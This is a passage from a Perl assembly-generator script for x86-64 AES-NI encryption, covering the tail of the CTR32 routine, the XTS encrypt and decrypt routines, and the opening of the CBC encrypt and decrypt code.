xorps $inout0,$in0
xorps $inout1,$in1
movups $in0,($out)
xorps $inout2,$in2
movups $in1,0x10($out)
xorps $inout3,$in3
movups $in2,0x20($out)
movups $in3,0x30($out)
.Lctr32_done:
___
$code.=<<___ if ($win64);
movaps 0x20(%rsp),%xmm6
movaps 0x30(%rsp),%xmm7
movaps 0x40(%rsp),%xmm8
movaps 0x50(%rsp),%xmm9
movaps 0x60(%rsp),%xmm10
movaps 0x70(%rsp),%xmm11
movaps 0x80(%rsp),%xmm12
movaps 0x90(%rsp),%xmm13
movaps 0xa0(%rsp),%xmm14
movaps 0xb0(%rsp),%xmm15
lea 0xc8(%rsp),%rsp
.Lctr32_ret:
___
$code.=<<___;
ret
.size aesni_ctr32_encrypt_blocks,.-aesni_ctr32_encrypt_blocks
___
}
######################################################################
# void aesni_xts_[en|de]crypt(const char *inp,char *out,size_t len,
# const AES_KEY *key1, const AES_KEY *key2
# const unsigned char iv[16]);
#
{
my @tweak=map("%xmm$_",(10..15));
my ($twmask,$twres,$twtmp)=("%xmm8","%xmm9",@tweak[4]);
my ($key2,$ivp,$len_)=("%r8","%r9","%r9");
my $frame_size = 0x68 + ($win64?160:0);
$code.=<<___;
.globl aesni_xts_encrypt
.type aesni_xts_encrypt,\@function,6
.align 16
aesni_xts_encrypt:
lea -$frame_size(%rsp),%rsp
___
$code.=<<___ if ($win64);
movaps %xmm6,0x60(%rsp)
movaps %xmm7,0x70(%rsp)
movaps %xmm8,0x80(%rsp)
movaps %xmm9,0x90(%rsp)
movaps %xmm10,0xa0(%rsp)
movaps %xmm11,0xb0(%rsp)
movaps %xmm12,0xc0(%rsp)
movaps %xmm13,0xd0(%rsp)
movaps %xmm14,0xe0(%rsp)
movaps %xmm15,0xf0(%rsp)
.Lxts_enc_body:
___
$code.=<<___;
movups ($ivp),@tweak[5] # load clear-text tweak
mov 240(%r8),$rounds # key2->rounds
mov 240($key),$rnds_ # key1->rounds
___
# generate the tweak
&aesni_generate1("enc",$key2,$rounds,@tweak[5]);
$code.=<<___;
mov $key,$key_ # backup $key
mov $rnds_,$rounds # backup $rounds
mov $len,$len_ # backup $len
and \$-16,$len
movdqa .Lxts_magic(%rip),$twmask
pxor $twtmp,$twtmp
pcmpgtd @tweak[5],$twtmp # broadcast upper bits
___
for ($i=0;$i<4;$i++) {
$code.=<<___;
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[$i]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
pand $twmask,$twres # isolate carry and residue
pcmpgtd @tweak[5],$twtmp # broadcat upper bits
pxor $twres,@tweak[5]
___
}
$code.=<<___;
sub \$16*6,$len
jc .Lxts_enc_short
shr \$1,$rounds
sub \$1,$rounds
mov $rounds,$rnds_
jmp .Lxts_enc_grandloop
.align 16
.Lxts_enc_grandloop:
pshufd \$0x13,$twtmp,$twres
movdqa @tweak[5],@tweak[4]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
movdqu `16*0`($inp),$inout0 # load input
pand $twmask,$twres # isolate carry and residue
movdqu `16*1`($inp),$inout1
pxor $twres,@tweak[5]
movdqu `16*2`($inp),$inout2
pxor @tweak[0],$inout0 # input^=tweak
movdqu `16*3`($inp),$inout3
pxor @tweak[1],$inout1
movdqu `16*4`($inp),$inout4
pxor @tweak[2],$inout2
movdqu `16*5`($inp),$inout5
lea `16*6`($inp),$inp
pxor @tweak[3],$inout3
$movkey ($key_),$rndkey0
pxor @tweak[4],$inout4
pxor @tweak[5],$inout5
# inline _aesni_encrypt6 and interleave first and last rounds
# with own code...
$movkey 16($key_),$rndkey1
pxor $rndkey0,$inout0
pxor $rndkey0,$inout1
movdqa @tweak[0],`16*0`(%rsp) # put aside tweaks
aesenc $rndkey1,$inout0
lea 32($key_),$key
pxor $rndkey0,$inout2
movdqa @tweak[1],`16*1`(%rsp)
aesenc $rndkey1,$inout1
pxor $rndkey0,$inout3
movdqa @tweak[2],`16*2`(%rsp)
aesenc $rndkey1,$inout2
pxor $rndkey0,$inout4
movdqa @tweak[3],`16*3`(%rsp)
aesenc $rndkey1,$inout3
pxor $rndkey0,$inout5
$movkey ($key),$rndkey0
dec $rounds
movdqa @tweak[4],`16*4`(%rsp)
aesenc $rndkey1,$inout4
movdqa @tweak[5],`16*5`(%rsp)
aesenc $rndkey1,$inout5
pxor $twtmp,$twtmp
pcmpgtd @tweak[5],$twtmp
jmp .Lxts_enc_loop6_enter
.align 16
.Lxts_enc_loop6:
aesenc $rndkey1,$inout0
aesenc $rndkey1,$inout1
dec $rounds
aesenc $rndkey1,$inout2
aesenc $rndkey1,$inout3
aesenc $rndkey1,$inout4
aesenc $rndkey1,$inout5
.Lxts_enc_loop6_enter:
$movkey 16($key),$rndkey1
aesenc $rndkey0,$inout0
aesenc $rndkey0,$inout1
lea 32($key),$key
aesenc $rndkey0,$inout2
aesenc $rndkey0,$inout3
aesenc $rndkey0,$inout4
aesenc $rndkey0,$inout5
$movkey ($key),$rndkey0
jnz .Lxts_enc_loop6
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
aesenc $rndkey1,$inout0
pand $twmask,$twres # isolate carry and residue
aesenc $rndkey1,$inout1
pcmpgtd @tweak[5],$twtmp # broadcast upper bits
aesenc $rndkey1,$inout2
pxor $twres,@tweak[5]
aesenc $rndkey1,$inout3
aesenc $rndkey1,$inout4
aesenc $rndkey1,$inout5
$movkey 16($key),$rndkey1
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[0]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
aesenc $rndkey0,$inout0
pand $twmask,$twres # isolate carry and residue
aesenc $rndkey0,$inout1
pcmpgtd @tweak[5],$twtmp # broadcat upper bits
aesenc $rndkey0,$inout2
pxor $twres,@tweak[5]
aesenc $rndkey0,$inout3
aesenc $rndkey0,$inout4
aesenc $rndkey0,$inout5
$movkey 32($key),$rndkey0
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[1]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
aesenc $rndkey1,$inout0
pand $twmask,$twres # isolate carry and residue
aesenc $rndkey1,$inout1
pcmpgtd @tweak[5],$twtmp # broadcat upper bits
aesenc $rndkey1,$inout2
pxor $twres,@tweak[5]
aesenc $rndkey1,$inout3
aesenc $rndkey1,$inout4
aesenc $rndkey1,$inout5
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[2]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
aesenclast $rndkey0,$inout0
pand $twmask,$twres # isolate carry and residue
aesenclast $rndkey0,$inout1
pcmpgtd @tweak[5],$twtmp # broadcat upper bits
aesenclast $rndkey0,$inout2
pxor $twres,@tweak[5]
aesenclast $rndkey0,$inout3
aesenclast $rndkey0,$inout4
aesenclast $rndkey0,$inout5
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[3]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
xorps `16*0`(%rsp),$inout0 # output^=tweak
pand $twmask,$twres # isolate carry and residue
xorps `16*1`(%rsp),$inout1
pcmpgtd @tweak[5],$twtmp # broadcat upper bits
pxor $twres,@tweak[5]
xorps `16*2`(%rsp),$inout2
movups $inout0,`16*0`($out) # write output
xorps `16*3`(%rsp),$inout3
movups $inout1,`16*1`($out)
xorps `16*4`(%rsp),$inout4
movups $inout2,`16*2`($out)
xorps `16*5`(%rsp),$inout5
movups $inout3,`16*3`($out)
mov $rnds_,$rounds # restore $rounds
movups $inout4,`16*4`($out)
movups $inout5,`16*5`($out)
lea `16*6`($out),$out
sub \$16*6,$len
jnc .Lxts_enc_grandloop
lea 3($rounds,$rounds),$rounds # restore original value
mov $key_,$key # restore $key
mov $rounds,$rnds_ # backup $rounds
.Lxts_enc_short:
add \$16*6,$len
jz .Lxts_enc_done
cmp \$0x20,$len
jb .Lxts_enc_one
je .Lxts_enc_two
cmp \$0x40,$len
jb .Lxts_enc_three
je .Lxts_enc_four
pshufd \$0x13,$twtmp,$twres
movdqa @tweak[5],@tweak[4]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
movdqu ($inp),$inout0
pand $twmask,$twres # isolate carry and residue
movdqu 16*1($inp),$inout1
pxor $twres,@tweak[5]
movdqu 16*2($inp),$inout2
pxor @tweak[0],$inout0
movdqu 16*3($inp),$inout3
pxor @tweak[1],$inout1
movdqu 16*4($inp),$inout4
lea 16*5($inp),$inp
pxor @tweak[2],$inout2
pxor @tweak[3],$inout3
pxor @tweak[4],$inout4
call _aesni_encrypt6
xorps @tweak[0],$inout0
movdqa @tweak[5],@tweak[0]
xorps @tweak[1],$inout1
xorps @tweak[2],$inout2
movdqu $inout0,($out)
xorps @tweak[3],$inout3
movdqu $inout1,16*1($out)
xorps @tweak[4],$inout4
movdqu $inout2,16*2($out)
movdqu $inout3,16*3($out)
movdqu $inout4,16*4($out)
lea 16*5($out),$out
jmp .Lxts_enc_done
.align 16
.Lxts_enc_one:
movups ($inp),$inout0
lea 16*1($inp),$inp
xorps @tweak[0],$inout0
___
&aesni_generate1("enc",$key,$rounds);
$code.=<<___;
xorps @tweak[0],$inout0
movdqa @tweak[1],@tweak[0]
movups $inout0,($out)
lea 16*1($out),$out
jmp .Lxts_enc_done
.align 16
.Lxts_enc_two:
movups ($inp),$inout0
movups 16($inp),$inout1
lea 32($inp),$inp
xorps @tweak[0],$inout0
xorps @tweak[1],$inout1
call _aesni_encrypt3
xorps @tweak[0],$inout0
movdqa @tweak[2],@tweak[0]
xorps @tweak[1],$inout1
movups $inout0,($out)
movups $inout1,16*1($out)
lea 16*2($out),$out
jmp .Lxts_enc_done
.align 16
.Lxts_enc_three:
movups ($inp),$inout0
movups 16*1($inp),$inout1
movups 16*2($inp),$inout2
lea 16*3($inp),$inp
xorps @tweak[0],$inout0
xorps @tweak[1],$inout1
xorps @tweak[2],$inout2
call _aesni_encrypt3
xorps @tweak[0],$inout0
movdqa @tweak[3],@tweak[0]
xorps @tweak[1],$inout1
xorps @tweak[2],$inout2
movups $inout0,($out)
movups $inout1,16*1($out)
movups $inout2,16*2($out)
lea 16*3($out),$out
jmp .Lxts_enc_done
.align 16
.Lxts_enc_four:
movups ($inp),$inout0
movups 16*1($inp),$inout1
movups 16*2($inp),$inout2
xorps @tweak[0],$inout0
movups 16*3($inp),$inout3
lea 16*4($inp),$inp
xorps @tweak[1],$inout1
xorps @tweak[2],$inout2
xorps @tweak[3],$inout3
call _aesni_encrypt4
xorps @tweak[0],$inout0
movdqa @tweak[5],@tweak[0]
xorps @tweak[1],$inout1
xorps @tweak[2],$inout2
movups $inout0,($out)
xorps @tweak[3],$inout3
movups $inout1,16*1($out)
movups $inout2,16*2($out)
movups $inout3,16*3($out)
lea 16*4($out),$out
jmp .Lxts_enc_done
.align 16
.Lxts_enc_done:
and \$15,$len_
jz .Lxts_enc_ret
mov $len_,$len
.Lxts_enc_steal:
movzb ($inp),%eax # borrow $rounds ...
movzb -16($out),%ecx # ... and $key
lea 1($inp),$inp
mov %al,-16($out)
mov %cl,0($out)
lea 1($out),$out
sub \$1,$len
jnz .Lxts_enc_steal
sub $len_,$out # rewind $out
mov $key_,$key # restore $key
mov $rnds_,$rounds # restore $rounds
movups -16($out),$inout0
xorps @tweak[0],$inout0
___
&aesni_generate1("enc",$key,$rounds);
$code.=<<___;
xorps @tweak[0],$inout0
movups $inout0,-16($out)
.Lxts_enc_ret:
___
$code.=<<___ if ($win64);
movaps 0x60(%rsp),%xmm6
movaps 0x70(%rsp),%xmm7
movaps 0x80(%rsp),%xmm8
movaps 0x90(%rsp),%xmm9
movaps 0xa0(%rsp),%xmm10
movaps 0xb0(%rsp),%xmm11
movaps 0xc0(%rsp),%xmm12
movaps 0xd0(%rsp),%xmm13
movaps 0xe0(%rsp),%xmm14
movaps 0xf0(%rsp),%xmm15
___
$code.=<<___;
lea $frame_size(%rsp),%rsp
.Lxts_enc_epilogue:
ret
.size aesni_xts_encrypt,.-aesni_xts_encrypt
___
$code.=<<___;
.globl aesni_xts_decrypt
.type aesni_xts_decrypt,\@function,6
.align 16
aesni_xts_decrypt:
lea -$frame_size(%rsp),%rsp
___
$code.=<<___ if ($win64);
movaps %xmm6,0x60(%rsp)
movaps %xmm7,0x70(%rsp)
movaps %xmm8,0x80(%rsp)
movaps %xmm9,0x90(%rsp)
movaps %xmm10,0xa0(%rsp)
movaps %xmm11,0xb0(%rsp)
movaps %xmm12,0xc0(%rsp)
movaps %xmm13,0xd0(%rsp)
movaps %xmm14,0xe0(%rsp)
movaps %xmm15,0xf0(%rsp)
.Lxts_dec_body:
___
$code.=<<___;
movups ($ivp),@tweak[5] # load clear-text tweak
mov 240($key2),$rounds # key2->rounds
mov 240($key),$rnds_ # key1->rounds
___
# generate the tweak
&aesni_generate1("enc",$key2,$rounds,@tweak[5]);
$code.=<<___;
xor %eax,%eax # if ($len%16) len-=16;
test \$15,$len
setnz %al
shl \$4,%rax
sub %rax,$len
mov $key,$key_ # backup $key
mov $rnds_,$rounds # backup $rounds
mov $len,$len_ # backup $len
and \$-16,$len
movdqa .Lxts_magic(%rip),$twmask
pxor $twtmp,$twtmp
pcmpgtd @tweak[5],$twtmp # broadcast upper bits
___
for ($i=0;$i<4;$i++) {
$code.=<<___;
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[$i]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
pand $twmask,$twres # isolate carry and residue
pcmpgtd @tweak[5],$twtmp # broadcat upper bits
pxor $twres,@tweak[5]
___
}
$code.=<<___;
sub \$16*6,$len
jc .Lxts_dec_short
shr \$1,$rounds
sub \$1,$rounds
mov $rounds,$rnds_
jmp .Lxts_dec_grandloop
.align 16
.Lxts_dec_grandloop:
pshufd \$0x13,$twtmp,$twres
movdqa @tweak[5],@tweak[4]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
movdqu `16*0`($inp),$inout0 # load input
pand $twmask,$twres # isolate carry and residue
movdqu `16*1`($inp),$inout1
pxor $twres,@tweak[5]
movdqu `16*2`($inp),$inout2
pxor @tweak[0],$inout0 # input^=tweak
movdqu `16*3`($inp),$inout3
pxor @tweak[1],$inout1
movdqu `16*4`($inp),$inout4
pxor @tweak[2],$inout2
movdqu `16*5`($inp),$inout5
lea `16*6`($inp),$inp
pxor @tweak[3],$inout3
$movkey ($key_),$rndkey0
pxor @tweak[4],$inout4
pxor @tweak[5],$inout5
# inline _aesni_decrypt6 and interleave first and last rounds
# with own code...
$movkey 16($key_),$rndkey1
pxor $rndkey0,$inout0
pxor $rndkey0,$inout1
movdqa @tweak[0],`16*0`(%rsp) # put aside tweaks
aesdec $rndkey1,$inout0
lea 32($key_),$key
pxor $rndkey0,$inout2
movdqa @tweak[1],`16*1`(%rsp)
aesdec $rndkey1,$inout1
pxor $rndkey0,$inout3
movdqa @tweak[2],`16*2`(%rsp)
aesdec $rndkey1,$inout2
pxor $rndkey0,$inout4
movdqa @tweak[3],`16*3`(%rsp)
aesdec $rndkey1,$inout3
pxor $rndkey0,$inout5
$movkey ($key),$rndkey0
dec $rounds
movdqa @tweak[4],`16*4`(%rsp)
aesdec $rndkey1,$inout4
movdqa @tweak[5],`16*5`(%rsp)
aesdec $rndkey1,$inout5
pxor $twtmp,$twtmp
pcmpgtd @tweak[5],$twtmp
jmp .Lxts_dec_loop6_enter
.align 16
.Lxts_dec_loop6:
aesdec $rndkey1,$inout0
aesdec $rndkey1,$inout1
dec $rounds
aesdec $rndkey1,$inout2
aesdec $rndkey1,$inout3
aesdec $rndkey1,$inout4
aesdec $rndkey1,$inout5
.Lxts_dec_loop6_enter:
$movkey 16($key),$rndkey1
aesdec $rndkey0,$inout0
aesdec $rndkey0,$inout1
lea 32($key),$key
aesdec $rndkey0,$inout2
aesdec $rndkey0,$inout3
aesdec $rndkey0,$inout4
aesdec $rndkey0,$inout5
$movkey ($key),$rndkey0
jnz .Lxts_dec_loop6
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
aesdec $rndkey1,$inout0
pand $twmask,$twres # isolate carry and residue
aesdec $rndkey1,$inout1
pcmpgtd @tweak[5],$twtmp # broadcast upper bits
aesdec $rndkey1,$inout2
pxor $twres,@tweak[5]
aesdec $rndkey1,$inout3
aesdec $rndkey1,$inout4
aesdec $rndkey1,$inout5
$movkey 16($key),$rndkey1
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[0]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
aesdec $rndkey0,$inout0
pand $twmask,$twres # isolate carry and residue
aesdec $rndkey0,$inout1
pcmpgtd @tweak[5],$twtmp # broadcat upper bits
aesdec $rndkey0,$inout2
pxor $twres,@tweak[5]
aesdec $rndkey0,$inout3
aesdec $rndkey0,$inout4
aesdec $rndkey0,$inout5
$movkey 32($key),$rndkey0
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[1]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
aesdec $rndkey1,$inout0
pand $twmask,$twres # isolate carry and residue
aesdec $rndkey1,$inout1
pcmpgtd @tweak[5],$twtmp # broadcat upper bits
aesdec $rndkey1,$inout2
pxor $twres,@tweak[5]
aesdec $rndkey1,$inout3
aesdec $rndkey1,$inout4
aesdec $rndkey1,$inout5
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[2]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
aesdeclast $rndkey0,$inout0
pand $twmask,$twres # isolate carry and residue
aesdeclast $rndkey0,$inout1
pcmpgtd @tweak[5],$twtmp # broadcat upper bits
aesdeclast $rndkey0,$inout2
pxor $twres,@tweak[5]
aesdeclast $rndkey0,$inout3
aesdeclast $rndkey0,$inout4
aesdeclast $rndkey0,$inout5
pshufd \$0x13,$twtmp,$twres
pxor $twtmp,$twtmp
movdqa @tweak[5],@tweak[3]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
xorps `16*0`(%rsp),$inout0 # output^=tweak
pand $twmask,$twres # isolate carry and residue
xorps `16*1`(%rsp),$inout1
pcmpgtd @tweak[5],$twtmp # broadcat upper bits
pxor $twres,@tweak[5]
xorps `16*2`(%rsp),$inout2
movups $inout0,`16*0`($out) # write output
xorps `16*3`(%rsp),$inout3
movups $inout1,`16*1`($out)
xorps `16*4`(%rsp),$inout4
movups $inout2,`16*2`($out)
xorps `16*5`(%rsp),$inout5
movups $inout3,`16*3`($out)
mov $rnds_,$rounds # restore $rounds
movups $inout4,`16*4`($out)
movups $inout5,`16*5`($out)
lea `16*6`($out),$out
sub \$16*6,$len
jnc .Lxts_dec_grandloop
lea 3($rounds,$rounds),$rounds # restore original value
mov $key_,$key # restore $key
mov $rounds,$rnds_ # backup $rounds
.Lxts_dec_short:
add \$16*6,$len
jz .Lxts_dec_done
cmp \$0x20,$len
jb .Lxts_dec_one
je .Lxts_dec_two
cmp \$0x40,$len
jb .Lxts_dec_three
je .Lxts_dec_four
pshufd \$0x13,$twtmp,$twres
movdqa @tweak[5],@tweak[4]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
movdqu ($inp),$inout0
pand $twmask,$twres # isolate carry and residue
movdqu 16*1($inp),$inout1
pxor $twres,@tweak[5]
movdqu 16*2($inp),$inout2
pxor @tweak[0],$inout0
movdqu 16*3($inp),$inout3
pxor @tweak[1],$inout1
movdqu 16*4($inp),$inout4
lea 16*5($inp),$inp
pxor @tweak[2],$inout2
pxor @tweak[3],$inout3
pxor @tweak[4],$inout4
call _aesni_decrypt6
xorps @tweak[0],$inout0
xorps @tweak[1],$inout1
xorps @tweak[2],$inout2
movdqu $inout0,($out)
xorps @tweak[3],$inout3
movdqu $inout1,16*1($out)
xorps @tweak[4],$inout4
movdqu $inout2,16*2($out)
pxor $twtmp,$twtmp
movdqu $inout3,16*3($out)
pcmpgtd @tweak[5],$twtmp
movdqu $inout4,16*4($out)
lea 16*5($out),$out
pshufd \$0x13,$twtmp,@tweak[1] # $twres
and \$15,$len_
jz .Lxts_dec_ret
movdqa @tweak[5],@tweak[0]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
pand $twmask,@tweak[1] # isolate carry and residue
pxor @tweak[5],@tweak[1]
jmp .Lxts_dec_done2
.align 16
.Lxts_dec_one:
movups ($inp),$inout0
lea 16*1($inp),$inp
xorps @tweak[0],$inout0
___
&aesni_generate1("dec",$key,$rounds);
$code.=<<___;
xorps @tweak[0],$inout0
movdqa @tweak[1],@tweak[0]
movups $inout0,($out)
movdqa @tweak[2],@tweak[1]
lea 16*1($out),$out
jmp .Lxts_dec_done
.align 16
.Lxts_dec_two:
movups ($inp),$inout0
movups 16($inp),$inout1
lea 32($inp),$inp
xorps @tweak[0],$inout0
xorps @tweak[1],$inout1
call _aesni_decrypt3
xorps @tweak[0],$inout0
movdqa @tweak[2],@tweak[0]
xorps @tweak[1],$inout1
movdqa @tweak[3],@tweak[1]
movups $inout0,($out)
movups $inout1,16*1($out)
lea 16*2($out),$out
jmp .Lxts_dec_done
.align 16
.Lxts_dec_three:
movups ($inp),$inout0
movups 16*1($inp),$inout1
movups 16*2($inp),$inout2
lea 16*3($inp),$inp
xorps @tweak[0],$inout0
xorps @tweak[1],$inout1
xorps @tweak[2],$inout2
call _aesni_decrypt3
xorps @tweak[0],$inout0
movdqa @tweak[3],@tweak[0]
xorps @tweak[1],$inout1
movdqa @tweak[5],@tweak[1]
xorps @tweak[2],$inout2
movups $inout0,($out)
movups $inout1,16*1($out)
movups $inout2,16*2($out)
lea 16*3($out),$out
jmp .Lxts_dec_done
.align 16
.Lxts_dec_four:
pshufd \$0x13,$twtmp,$twres
movdqa @tweak[5],@tweak[4]
paddq @tweak[5],@tweak[5] # psllq 1,$tweak
movups ($inp),$inout0
pand $twmask,$twres # isolate carry and residue
movups 16*1($inp),$inout1
pxor $twres,@tweak[5]
movups 16*2($inp),$inout2
xorps @tweak[0],$inout0
movups 16*3($inp),$inout3
lea 16*4($inp),$inp
xorps @tweak[1],$inout1
xorps @tweak[2],$inout2
xorps @tweak[3],$inout3
call _aesni_decrypt4
xorps @tweak[0],$inout0
movdqa @tweak[4],@tweak[0]
xorps @tweak[1],$inout1
movdqa @tweak[5],@tweak[1]
xorps @tweak[2],$inout2
movups $inout0,($out)
xorps @tweak[3],$inout3
movups $inout1,16*1($out)
movups $inout2,16*2($out)
movups $inout3,16*3($out)
lea 16*4($out),$out
jmp .Lxts_dec_done
.align 16
.Lxts_dec_done:
and \$15,$len_
jz .Lxts_dec_ret
.Lxts_dec_done2:
mov $len_,$len
mov $key_,$key # restore $key
mov $rnds_,$rounds # restore $rounds
movups ($inp),$inout0
xorps @tweak[1],$inout0
___
&aesni_generate1("dec",$key,$rounds);
$code.=<<___;
xorps @tweak[1],$inout0
movups $inout0,($out)
.Lxts_dec_steal:
movzb 16($inp),%eax # borrow $rounds ...
movzb ($out),%ecx # ... and $key
lea 1($inp),$inp
mov %al,($out)
mov %cl,16($out)
lea 1($out),$out
sub \$1,$len
jnz .Lxts_dec_steal
sub $len_,$out # rewind $out
mov $key_,$key # restore $key
mov $rnds_,$rounds # restore $rounds
movups ($out),$inout0
xorps @tweak[0],$inout0
___
&aesni_generate1("dec",$key,$rounds);
$code.=<<___;
xorps @tweak[0],$inout0
movups $inout0,($out)
.Lxts_dec_ret:
___
$code.=<<___ if ($win64);
movaps 0x60(%rsp),%xmm6
movaps 0x70(%rsp),%xmm7
movaps 0x80(%rsp),%xmm8
movaps 0x90(%rsp),%xmm9
movaps 0xa0(%rsp),%xmm10
movaps 0xb0(%rsp),%xmm11
movaps 0xc0(%rsp),%xmm12
movaps 0xd0(%rsp),%xmm13
movaps 0xe0(%rsp),%xmm14
movaps 0xf0(%rsp),%xmm15
___
$code.=<<___;
lea $frame_size(%rsp),%rsp
.Lxts_dec_epilogue:
ret
.size aesni_xts_decrypt,.-aesni_xts_decrypt
___
} }}
########################################################################
# void $PREFIX_cbc_encrypt (const void *inp, void *out,
# size_t length, const AES_KEY *key,
# unsigned char *ivp,const int enc);
{
my $reserved = $win64?0x40:-0x18; # used in decrypt
$code.=<<___;
.globl ${PREFIX}_cbc_encrypt
.type ${PREFIX}_cbc_encrypt,\@function,6
.align 16
${PREFIX}_cbc_encrypt:
test $len,$len # check length
jz .Lcbc_ret
mov 240($key),$rnds_ # key->rounds
mov $key,$key_ # backup $key
test %r9d,%r9d # 6th argument
jz .Lcbc_decrypt
#--------------------------- CBC ENCRYPT ------------------------------#
movups ($ivp),$inout0 # load iv as initial state
mov $rnds_,$rounds
cmp \$16,$len
jb .Lcbc_enc_tail
sub \$16,$len
jmp .Lcbc_enc_loop
.align 16
.Lcbc_enc_loop:
movups ($inp),$inout1 # load input
lea 16($inp),$inp
#xorps $inout1,$inout0
___
&aesni_generate1("enc",$key,$rounds,$inout0,$inout1);
$code.=<<___;
mov $rnds_,$rounds # restore $rounds
mov $key_,$key # restore $key
movups $inout0,0($out) # store output
lea 16($out),$out
sub \$16,$len
jnc .Lcbc_enc_loop
add \$16,$len
jnz .Lcbc_enc_tail
movups $inout0,($ivp)
jmp .Lcbc_ret
.Lcbc_enc_tail:
mov $len,%rcx # zaps $key
xchg $inp,$out # $inp is %rsi and $out is %rdi now
.long 0x9066A4F3 # rep movsb
mov \$16,%ecx # zero tail
sub $len,%rcx
xor %eax,%eax
.long 0x9066AAF3 # rep stosb
lea -16(%rdi),%rdi # rewind $out by 1 block
mov $rnds_,$rounds # restore $rounds
mov %rdi,%rsi # $inp and $out are the same
mov $key_,$key # restore $key
xor $len,$len # len=16
jmp .Lcbc_enc_loop # one more spin
#--------------------------- CBC DECRYPT ------------------------------#
.align 16
.Lcbc_decrypt:
___
$code.=<<___ if ($win64);
lea -0x58(%rsp),%rsp
movaps %xmm6,(%rsp)
movaps %xmm7,0x10(%rsp)
movaps %xmm8,0x20(%rsp)
movaps %xmm9,0x30(%rsp)
.Lcbc_decrypt_body:
___
$code.=<<___;
movups ($ivp),$iv
mov $rnds_,$rounds
cmp \$0x70,$len
jbe .Lcbc_dec_tail
shr \$1,$rnds_
sub \$0x70,$len
mov $rnds_,$rounds
movaps $iv,$reserved(%rsp)
jmp .Lcbc_dec_loop8_enter
.align 16
.Lcbc_dec_loop8:
movaps $rndkey0,$reserved(%rsp) # save IV
movups $inout7,($out)
lea 0x10($out),$out
.Lcbc_dec_loop8_enter:
$movkey ($key),$rndkey0
movups ($inp),$inout0 # load input
movups 0x10($inp),$inout1
$movkey 16($key),$rndkey1
lea 32($key),$key
movdqu 0x20($inp),$inout2
xorps $rndkey0,$inout0
movdqu 0x30($inp),$inout3
xorps $rndkey0,$inout1
movdqu 0x40($inp),$inout4
aesdec $rndkey1,$inout0
pxor $rndkey0,$inout2
movdqu 0x50($inp),$inout5
aesdec $rndkey1,$inout1
pxor $rndkey0,$inout3
movdqu 0x60($inp),$inout6
aesdec $rndkey1,$inout2
pxor $rndkey0,$inout4
movdqu 0x70($inp),$inout7
aesdec $rndkey1,$inout3
pxor $rndkey0,$inout5
dec $rounds
aesdec $rndkey1,$inout4
pxor $rndkey0,$inout6
aesdec $rndkey1,$inout5
pxor $rndkey0,$inout7
$movkey ($key),$rndkey0
aesdec $rndkey1,$inout6
aesdec $rndkey1,$inout7
$movkey 16($key),$rndkey1
call .Ldec_loop8_enter
movups ($inp),$rndkey1 # re-load input
movups 0x10($inp),$rndkey0
xorps $reserved(%rsp),$inout0 # ^= IV
xorps $rndkey1,$inout1
movups 0x20($inp),$rndkey1
xorps $rndkey0,$inout2
movups 0x30($inp),$rndkey0
xorps $rndkey1,$inout3
movups 0x40($inp),$rndkey1
xorps $rndkey0,$inout4
movups 0x50($inp),$rndkey0
xorps $rndkey1,$inout5
movups 0x60($inp),$rndkey1
xorps $rndkey0,$inout6
movups 0x70($inp),$rndkey0 # IV
xorps $rndkey1,$inout7
movups $inout0,($out)
movups $inout1,0x10($out)
movups $inout2,0x20($out)
movups $inout3,0x30($out)
mov $rnds_,$rounds # restore $rounds
movups $inout4,0x40($out)
mov $key_,$key # restore $key
movups $inout5,0x50($out)
lea 0x80($inp),$inp
movups $inout6,0x60($out)
lea 0x70($out),$out
sub \$0x80,$len
ja .Lcbc_dec_loop8
movaps $inout7,$inout0
movaps $rndkey0,$iv
add \$0x70,$len
jle .Lcbc_dec_tail_collected
movups $inout0,($out)
lea 1($rnds_,$rnds_),$rounds
lea 0x10($out),$out
.Lcbc_dec_tail:
movups ($inp),$inout0
movaps $inout0,$in0
cmp \$0x10,$len
jbe .Lcbc_dec_one
movups 0x10($inp),$inout1
movaps $inout1,$in1
cmp \$0x20,$len
jbe .Lcbc_dec_two
movups 0x20($inp),$inout2
movaps $inout2,$in2
cmp \$0x30,$len
jbe .Lcbc_dec_three
movups 0x30($inp),$inout3
cmp \$0x40,$len
jbe .Lcbc_dec_four
movups 0x40($inp),$inout4
cmp \$0x50,$len
jbe .Lcbc_dec_five
movups 0x50($inp),$inout5
cmp \$0x60,$len
jbe .Lcbc_dec_six
movups 0x60($inp),$inout6
movaps $iv,$reserved(%rsp) # save IV
call _aesni_decrypt8
movups ($inp),$rndkey1
movups 0x10($inp),$rndkey0
xorps $reserved(%rsp),$inout0 # ^= IV
xorps $rndkey1,$inout1
movups 0x20($inp),$rndkey1
xorps $rndkey0,$inout2
movups 0x30($inp),$rndkey0
